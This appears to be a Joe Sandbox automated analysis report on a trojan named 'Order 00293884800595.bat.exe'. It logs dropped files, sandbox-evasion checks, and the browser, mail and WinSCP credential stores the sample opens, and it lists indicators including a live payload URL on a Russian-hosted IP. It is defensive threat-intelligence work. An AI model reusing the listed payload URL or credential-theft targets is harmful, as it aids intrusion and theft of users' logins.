          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00150C6D push edi; retf 8_2_00150C7A
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FB80B0 pushad ; ret 8_2_35FB845D
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FBA040 push eax; ret 8_2_35FBA041
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_35FB9F4E push ecx; ret 8_2_35FB9F4F
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Ragworm.LoyJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Allopurinol.fluJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Incute.RebJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Charting.skrJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\chokoladeforretning.marJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\doubling.regJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\hmoriderne.nerJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\TyndstegsfiletsJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\lvens.flbJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\FigurmrkerneJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\materialiter.sigJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\preinvest.priJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\ridningen.txtJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeAPI/Special instruction interceptor: Address: 569A83C
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeAPI/Special instruction interceptor: Address: 26CA83C
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeMemory allocated: 33EA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeMemory allocated: 33DD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405A4F
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_00406620 FindFirstFileA,FindClose,5_2_00406620
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_004027CF FindFirstFileA,5_2_004027CF
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,8_2_00405A4F
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_00406620 FindFirstFileA,FindClose,8_2_00406620
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 8_2_004027CF FindFirstFileA,8_2_004027CF
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003878000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeAPI call chain: ExitProcess graph end nodegraph_5-4674
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeAPI call chain: ExitProcess graph end nodegraph_5-4525
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_6CA51B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_6CA51B28
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeProcess created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeQueries volume information: C:\Users\user\Desktop\Order 00293884800595.bat.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeCode function: 5_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004033D8
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\Order 00293884800595.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: Yara matchFile source: 00000008.00000002.1807122448137.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Order 00293884800595.bat.exe PID: 8160, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          3
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          1
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          126
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
          Process Injection
          2
          Obfuscated Files or Information
          Security Account Manager211
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          NTDS12
          Virtualization/Sandbox Evasion
          Distributed Component Object Model1
          Clipboard Data
          13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets1
          System Network Configuration Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
          Virtualization/Sandbox Evasion
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Order 00293884800595.bat.exe100%AviraHEUR/AGEN.1338492
          Order 00293884800595.bat.exe14%ReversingLabsWin32.Trojan.Generic
          Order 00293884800595.bat.exe20%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll1%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll0%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          api.ipify.org0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://api.ipify.org0%Avira URL Cloudsafe
          http://109.248.151.29/DttVKmqMztLpGMCsim17.binu0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
          https://api.ipify.org/0%Avira URL Cloudsafe
          https://api.ipify.org/t0%Avira URL Cloudsafe
          http://109.248.151.29/DttVKmqMztLpGMCsim17.bin100%Avira URL Cloudmalware
          http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
          https://api.ipify.org/1%VirustotalBrowse
          http://www.skinstudio.netG0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
          http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
          https://api.ipify.org1%VirustotalBrowse
          https://api.ipify.org/t0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          api.ipify.org
          172.67.74.152
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          https://api.ipify.org/false
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://109.248.151.29/DttVKmqMztLpGMCsim17.binfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://api.ipify.orgOrder 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorOrder 00293884800595.bat.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorErrorOrder 00293884800595.bat.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://109.248.151.29/DttVKmqMztLpGMCsim17.binuOrder 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003858000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.ipify.org/tOrder 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.skinstudio.netGOrder 00293884800595.bat.exefalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          109.248.151.29
          unknownRussian Federation
          52048DATACLUBLVfalse
          172.67.74.152
          api.ipify.orgUnited States
          13335CLOUDFLARENETUSfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1465164
          Start date and time:2024-07-01 12:08:00 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 15m 16s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:19
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order 00293884800595.bat.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/17@1/2
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 95%
          • Number of executed functions: 127
          • Number of non-executed functions: 67
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target Order 00293884800595.bat.exe, PID 8160 because it is empty
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          109.248.151.29Order 000293884849900.bat.exeGet hashmaliciousGuLoaderBrowse
          • 109.248.151.29/RjdSJnnj92.bin
          172.67.74.152242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
          • api.ipify.org/?format=wef
          K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          stub.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          stub.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          Sonic-Glyder.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          Sky-Beta.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/?format=json
          Sky-Beta.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/?format=json
          Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          Sky-Beta.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          SongOfVikings.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/?format=json
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          api.ipify.orgDHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
          • 172.67.74.152
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36Get hashmaliciousHTMLPhisherBrowse
          • 104.26.12.205
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36Get hashmaliciousHTMLPhisherBrowse
          • 172.67.74.152
          ORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
          • 104.26.13.205
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          Find-DscResource_QoS.ps1Get hashmaliciousUnknownBrowse
          • 104.26.12.205
          https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36Get hashmaliciousHTMLPhisherBrowse
          • 172.67.74.152
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          DATACLUBLVOrder 000293884849900.bat.exeGet hashmaliciousGuLoaderBrowse
          • 109.248.151.29
          rUniversidadedeBras#U00edlia-ProjetoFMD20240342.vbsGet hashmaliciousUnknownBrowse
          • 109.248.151.238
